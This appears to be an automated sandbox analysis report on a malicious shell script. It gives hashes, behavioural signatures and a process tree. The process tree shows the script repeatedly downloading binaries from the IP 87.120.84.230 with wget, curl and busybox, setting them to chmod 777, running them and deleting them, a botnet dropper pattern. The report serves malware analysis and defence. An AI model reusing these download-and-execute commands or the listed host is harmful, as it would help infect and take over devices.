Analysis
-
max time kernel
65s -
max time network
67s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:19
Static task
static1
Behavioral task
behavioral1
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
-
Size
10KB
-
MD5
a5a9f72ca25763058aacf1994a85b616
-
SHA1
748843de754f9484c22ebf1e32e5894d70f4859f
-
SHA256
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86
-
SHA512
47f9975ff7556dfa8ceecd5af09a40a67e07ddd1478bfee1cbe1189d252b5fe35d0a098fa94c5aa6aa5694f33bb0b776685ddd59772184b7d42fa2a5d78e6cea
-
SSDEEP
192:oPTGhYwtdd5GFV2ER73e7jb18jgZPTGhYwDd5GFVW73e7jVIU:QgbEo18Uftx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 963 chmod 735 chmod 847 chmod 897 chmod 939 chmod 951 chmod 747 chmod 867 chmod 891 chmod 915 chmod 802 chmod 909 chmod 861 chmod 945 chmod 957 chmod 903 chmod 885 chmod 810 chmod 816 chmod 879 chmod 927 chmod 933 chmod 969 chmod 741 chmod 873 chmod 921 chmod 975 chmod 773 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X 736 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh 742 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg 748 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s 774 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA 804 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX 811 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva 817 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 848 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv 862 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox 868 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl 874 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ 880 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 886 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn 892 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh 898 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg 904 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s 910 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA 916 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X 922 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX 928 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva 934 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 940 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv 946 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl 952 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ 958 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 964 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn 970 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox 976 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s curl File opened for modification /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX curl File opened for modification /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv curl File opened for modification /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv curl File opened for modification /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ curl File opened for modification /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s curl File opened for modification /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 curl File opened for modification /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh curl File opened for modification /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 curl File opened for modification /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 curl File opened for modification /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn curl File opened for modification /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox curl File opened for modification /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 curl File opened for modification /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X curl File opened for modification /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox curl File opened for modification /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X curl File opened for modification /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva curl File opened for modification /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl curl File opened for modification /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn curl File opened for modification /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA curl File opened for modification /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl curl File opened for modification /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg curl File opened for modification /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA curl File opened for modification /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg curl File opened for modification /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva curl File opened for modification /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ curl File opened for modification /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh curl File opened for modification /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX curl
Processes
-
/tmp/2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh/tmp/2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh1⤵PID:706
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:717
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:726
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:733
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:738
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:740
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:746
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:767
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:777
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:778
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:786
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:796
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:805
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:806
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:809
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:815
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:841
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:852
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:853
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:860
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:866
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:872
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:878
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:884
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:890
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:896
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:902
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:908
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:914
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:920
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:926
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:932
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:936
-
-
